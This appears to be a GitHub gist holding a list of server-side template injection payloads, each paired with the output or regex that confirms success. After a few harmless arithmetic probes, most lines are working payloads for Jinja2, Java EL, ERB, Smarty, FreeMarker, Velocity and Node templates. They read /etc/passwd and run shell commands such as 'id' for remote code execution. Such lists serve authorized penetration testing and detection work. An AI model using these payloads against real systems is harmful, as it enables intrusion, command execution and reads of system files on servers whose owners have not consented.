@ratnadip1998
Last active February 5, 2026 20:16
# SSTI payloads (one per line)
# payload||expected_output
# Example confirm:
# {{7*7}}||49
#
# File-read confirm example:
# {{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}||root:x:0:0
# Safe math confirms
{{7*7}}||49
${7*7}||49
<%= 7*7 %>||49
{7*7}||49
{{ 7 * 7 }}||49
# Advanced safe diff proof
{{7*7}}-{{7*8}}||49-56
# Liquid
{{ 7 | times: 7 }}||49
# Velocity
#set($x=7*7)$x||49
# Possible fingerprint (no expected)
{{config}}
# File read
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}||root:x:0:0:
${new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}||root:x:0:0:
<%= File.read('/etc/passwd') %>||root:x:0:0:
{php}echo file_get_contents('/etc/passwd');{/php}||root:x:0:0:
# RCE
{{lipsum.__globals__['os'].popen('id').read()}}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
${T(java.lang.Runtime).getRuntime().exec('id')}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
<%= system('id') %>||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
{php}system('id');{/php}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
${"freemarker.template.utility.Execute"?new()("id")}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('id'))||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
#{process.mainModule.require('child_process').execSync('id').toString()}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)